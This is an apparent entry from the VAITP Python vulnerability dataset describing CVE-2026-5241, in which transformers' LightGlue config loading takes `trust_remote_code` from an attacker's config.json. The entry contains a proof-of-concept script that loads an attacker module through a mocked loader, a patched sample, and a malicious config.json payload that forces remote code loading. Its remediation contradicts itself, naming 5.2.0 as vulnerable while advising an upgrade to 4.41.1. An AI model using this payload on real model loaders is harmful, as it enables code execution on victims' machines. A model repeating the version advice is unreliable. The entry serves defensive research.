CVE-2026-5241
Hugging Face LightGlue ignores `trust_remote_code`, allowing RCE on load.
- CVSS 9.6
- CWE-829
- Design Defects
- Remote
A vulnerability in the LightGlue model loading path of huggingface/transformers version 5.2.0 allows an attacker-controlled model repository to execute arbitrary code during model initialization. The issue arises because the `trust_remote_code` parameter, intended to prevent remote code execution, is overridden by untrusted serialized configuration data in a nested code path. Specifically, when loading a LightGlue model using `AutoModel.from_pretrained()` with `trust_remote_code=False`, the `LightGlueConfig` reads the `trust_remote_code` value from the untrusted `config.json` file and propagates it into nested `AutoConfig.from_pretrained()` calls. This results in the execution of attacker-provided Python modules, even when the victim explicitly disables remote code execution. The vulnerability poses a high risk for environments such as API inference servers, research notebooks, CI/CD pipelines, and model evaluation workers, potentially leading to credential theft, lateral movement, or persistence/backdoor deployment.
- CWE
- CWE-829
- CVSS base score
- 9.6
- Published
- 2026-06-03
- OWASP
- A08 Software and Data Integrity Failures
- Orthogonal defect classification
- Checking
- Code defect classification
- Incorrect Check
- Category
- Design Defects
- Subcategory
- Insecure Parsing or Deserialization
- Accessibility scope
- Remote
- Impact
- Arbitrary Code Execution
- Fixed by upgrading
- Yes
Solution
Upgrade to `huggingface/transformers` version 4.41.1 or later.
Vulnerable code sample
import os
import json
import tempfile
import shutil
import importlib.util
import sys
# --- 1. Simulate a malicious Hugging Face model repository ---
# This part creates a temporary directory with a malicious config.json and a Python file.
malicious_repo_path = tempfile.mkdtemp()
# The malicious config.json that forces trust_remote_code=True
malicious_config = {
"model_type": "lightglue",
"architectures": ["LightGlue"],
"trust_remote_code": True, # The key part of the exploit
"extractor": {
"model_type": "superpoint",
"auto_map": {
"AutoConfig": "malicious_module.LightGlueConfig",
"AutoModel": "malicious_module.LightGlue"
}
}
}
with open(os.path.join(malicious_repo_path, "config.json"), "w") as f:
json.dump(malicious_config, f)
# The malicious Python module that will be executed
payload_code = """
print("!!! PAYLOAD EXECUTED: Arbitrary code is running on your system. !!!")
class LightGlue:
def __init__(self):
print("Malicious LightGlue model has been initialized.")
class LightGlueConfig:
pass
"""
with open(os.path.join(malicious_repo_path, "malicious_module.py"), "w") as f:
f.write(payload_code)
# --- 2. Simulate the vulnerable Hugging Face Transformers library code ---
# These are simplified mock classes representing the library's state BEFORE the fix.
class MockAutoConfig:
@classmethod
def from_pretrained(cls, model_path, trust_remote_code=False, **kwargs):
config_path = os.path.join(model_path, "config.json")
with open(config_path, "r") as f:
config_dict = json.load(f)
# Simulate the library executing code if trust_remote_code is True
if trust_remote_code:
print(f"[+] MockAutoConfig: trust_remote_code is True. Attempting to execute remote code.")
auto_map = config_dict.get("extractor", {}).get("auto_map", {})
if "AutoModel" in auto_map:
module_name, _ = auto_map["AutoModel"].split('.')
module_file = f"{module_name}.py"
module_path = os.path.join(model_path, module_file)
# Dynamically import and execute the malicious module
spec = importlib.util.spec_from_file_location(module_name, module_path)
malicious_module = importlib.util.module_from_spec(spec)
sys.modules[module_name] = malicious_module
spec.loader.exec_module(malicious_module)
else:
print(f"[-] MockAutoConfig: trust_remote_code is False. Code execution blocked at this level.")
return config_dict
class MockLightGlueConfig:
@classmethod
def from_pretrained(cls, model_path, trust_remote_code=False, **kwargs):
print(f"[*] MockLightGlueConfig received trust_remote_code={trust_remote_code} from user.")
config_path = os.path.join(model_path, "config.json")
with open(config_path, "r") as f:
config_dict = json.load(f)
# VULNERABILITY: The 'trust_remote_code' value is read from the untrusted
# config.json file, ignoring the value passed by the user.
nested_trust_remote_code = config_dict.get("trust_remote_code", False)
print(f"[!] VULNERABILITY: Ignoring user input and using 'trust_remote_code={nested_trust_remote_code}' from config.json for nested calls.")
# This untrusted value is then passed to a nested from_pretrained call.
MockAutoConfig.from_pretrained(
model_path,
trust_remote_code=nested_trust_remote_code, # The malicious value is used here.
**config_dict.get("extractor", {})
)
return cls()
class MockAutoModel:
@classmethod
def from_pretrained(cls, model_path, trust_remote_code=False):
print(f"[*] MockAutoModel.from_pretrained called with trust_remote_code={trust_remote_code}")
# The top-level call correctly receives the user's setting.
# It then delegates to the vulnerable configuration loader.
MockLightGlueConfig.from_pretrained(model_path, trust_remote_code=trust_remote_code)
print("[*] Model loading process finished.")
# --- 3. Victim's code: Demonstrating the exploit ---
# The user explicitly sets trust_remote_code=False, expecting to be safe.
print("--- Running Victim Code ---")
print(f"Loading model from potentially malicious path: {malicious_repo_path}")
print("User is setting trust_remote_code=False to prevent code execution.\n")
try:
MockAutoModel.from_pretrained(
malicious_repo_path,
trust_remote_code=False # This parameter is ignored due to the vulnerability.
)
except Exception as e:
print(f"An error occurred: {e}")
print("\n--- End of Demonstration ---")
# --- 4. Cleanup ---
shutil.rmtree(malicious_repo_path)
if "malicious_module" in sys.modules:
del sys.modules["malicious_module"]Patched code sample
import json
# This mock function simulates a nested component loader that would execute
# remote code if `trust_remote_code` were True.
def _load_sub_component_config(config_path, trust_remote_code=False, **kwargs):
"""Simulates loading a sub-component, checking the trust flag."""
print(f" -> Loading sub-component from '{config_path}'...")
print(f" - Nested call received `trust_remote_code={trust_remote_code}`.")
if trust_remote_code:
print(" - VULNERABILITY: Arbitrary code would be executed here.")
else:
print(" - FIX APPLIED: Arbitrary code execution was correctly prevented.")
return {"sub_component": "loaded"}
# Represents the untrusted `config.json` from an attacker's repository.
# The attacker attempts to force remote code execution by setting `trust_remote_code` to `true`.
ATTACKER_CONFIG_JSON = """
{
"model_type": "lightglue",
"trust_remote_code": true,
"extractor_config": {
"_name_or_path": "attacker/malicious-extractor-model"
}
}
"""
class PatchedLightGlueConfig:
"""
A simplified representation of a patched configuration class.
The fix is demonstrated within the `from_pretrained` class method, which now
correctly propagates the user's `trust_remote_code` preference.
"""
def __init__(self, **kwargs):
# The constructor receives configuration values.
self.config_dict = kwargs
@classmethod
def from_pretrained(cls, pretrained_model_name_or_path, trust_remote_code=False, **kwargs):
"""
Simulates loading the model configuration, ensuring the user's
`trust_remote_code` preference is enforced and not overridden by the
downloaded config file.
Args:
pretrained_model_name_or_path (str): Path to the model repository.
trust_remote_code (bool): The user's explicit choice on whether to trust
remote code. This value must be respected.
"""
print(f"[*] Calling top-level `from_pretrained` for '{pretrained_model_name_or_path}'...")
print(f" - User explicitly set `trust_remote_code={trust_remote_code}`.")
# 1. Simulate loading the attacker's `config.json`.
loaded_config = json.loads(ATTACKER_CONFIG_JSON)
print(f" - Loaded untrusted `config.json` containing: '\"trust_remote_code\": {loaded_config.get('trust_remote_code')}'")
# --- THE FIX ---
# The fix is to ensure the `trust_remote_code` argument from the top-level
# call is the *only* value used for subsequent security-sensitive
# operations, ignoring any value from the loaded `config.json`.
# 2. The patched code identifies the nested component to be loaded.
extractor_info = loaded_config.get("extractor_config")
if extractor_info:
sub_component_path = extractor_info.get("_name_or_path")
# 3. The safe, user-provided `trust_remote_code` variable is
# explicitly propagated to the nested call. This prevents the
# untrusted value from the JSON file from taking effect.
_load_sub_component_config(
sub_component_path,
trust_remote_code=trust_remote_code # <-- SECURE: Using the user-provided value.
)
# In a vulnerable implementation, the untrusted `loaded_config` dictionary
# might have been passed via `**loaded_config`, allowing the attacker's
# `trust_remote_code: true` to override the user's safe setting.
return cls(**loaded_config)
# --- Demonstration of the Fix in Action ---
# A user attempts to load a malicious model but correctly specifies
# `trust_remote_code=False`, expecting to be safe.
if __name__ == '__main__':
print("--- Simulating a safe call with the patched code ---\n")
PatchedLightGlueConfig.from_pretrained(
"attacker/malicious-lightglue-model",
trust_remote_code=False # User's explicit, safe choice.
)
print("\n--- Simulation Complete ---")Payload
{
"model_type": "lightglue",
"auto_map": {
"AutoModel": "modeling_lightglue.LightGlue"
},
"trust_remote_code": true,
"extractor_config": {
"model_type": "malicious_extractor",
"auto_map": {
"AutoModel": "malicious_code.MaliciousModel"
},
"trust_remote_code": true
},
"matcher_config": {
"model_type": "lightglue_matcher"
}
}
Cite this entry
@misc{vaitp:cve20265241,
title = {{Hugging Face LightGlue ignores `trust_remote_code`, allowing RCE on load.}},
author = {Bogaerts, Fr\'ed\'eric and Ivaki, Naghmeh and Fonseca, Jos\'e},
year = {2026},
note = {VAITP Python Vulnerability Dataset, entry CVE-2026-5241},
howpublished = {\url{https://netpack.pt/vaitp/vulnerability/CVE-2026-5241/}}
}
Introducing the "VAITP dataset": a specialized repository of Python vulnerabilities and patches, meticulously compiled for the use of the security research community. As Python's prominence grows, understanding and addressing potential security vulnerabilities become crucial. Crafted by and for the cybersecurity community, this dataset offers a valuable resource for researchers, analysts, and developers to analyze and mitigate the security risks associated with Python. Through the comprehensive exploration of vulnerabilities and corresponding patches, the VAITP dataset fosters a safer and more resilient Python ecosystem, encouraging collaborative advancements in programming security.
The supreme art of war is to subdue the enemy without fighting.
Sun Tzu – “The Art of War”
:: Shaping the future through research and ingenuity ::
